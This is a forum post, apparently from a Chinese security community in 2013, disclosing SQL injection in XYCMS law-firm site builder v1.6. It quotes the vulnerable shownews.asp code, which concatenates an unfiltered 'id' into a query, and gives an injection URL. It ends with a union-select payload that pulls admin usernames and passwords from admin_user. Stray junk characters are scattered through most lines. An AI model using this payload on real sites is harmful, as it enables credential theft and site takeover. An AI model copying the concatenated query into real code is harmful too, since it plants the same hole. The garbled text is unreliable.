找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2193|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
  r8 m9 Q' M6 E' M) A- `( E* \1 Y ! g( p0 L/ m4 P
淫荡分割线" H! j( X# b; ^, v- I2 E
--------------------------------------------------------9 o" S8 k& W1 R4 l7 F+ o
8 }  }" k: `+ G3 u3 C
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
1 J7 J( u( H3 F4 Q- W! P; g源码地址:http://down.chinaz.com/soft/29233.htm" c: X: r- s7 o
1 i! c. m6 r( s+ i3 w
漏洞文件:shownews.asp3 ^6 a/ F( Y2 m2 a' \, ]4 L* A
漏洞代码:7-13行9 u$ k8 q" A5 ~+ k3 M

% O% A* Y/ ^% }1 _+ u
- N/ ]- g6 r; S2 L2 R- m2 C+ P<% % [' N; a+ @2 A. }; x" G1 B5 J9 P, h
id=request.QueryString("id")+ G) p: ^& X+ A, s' q% |
   
) A* R" e  o1 F; ?set snews=server.createobject("adodb.recordset") 2 Y# T+ K# |* `# I/ H  A
exec="select * from [news] where id="&id/ S. w8 O' o4 M, W) h3 v
snews.open exec,conn,1,1
* ^9 h8 C" v* N  Y" o( o2 t$ [%>0 D- E9 U! m& y) }2 B
  T% f) U: w. |2 M$ [3 f
; R' R- ?7 |( B1 a  V  Y
什么过滤都没有  直造成注入! ~: o1 [6 b" f

0 c/ k1 p% `, M1 N5 j1 S注入点:http://127.0.0.1:99/shownews.asp?id=xx
+ |( d* T3 }. b# ]; }* Q
6 Q0 c1 q, A: r; G, Y* W其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找! ~; ?2 o! N+ m1 M  P! ^+ c

& e% n. t: I% T. B% e
; {' `( J2 l- N' B$ aexp: union select 1,admin,password,4,5,7 from admin_user; N# ?  Y: d) l0 {

+ g! @# D& @8 j+ a4 W+ L3 _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表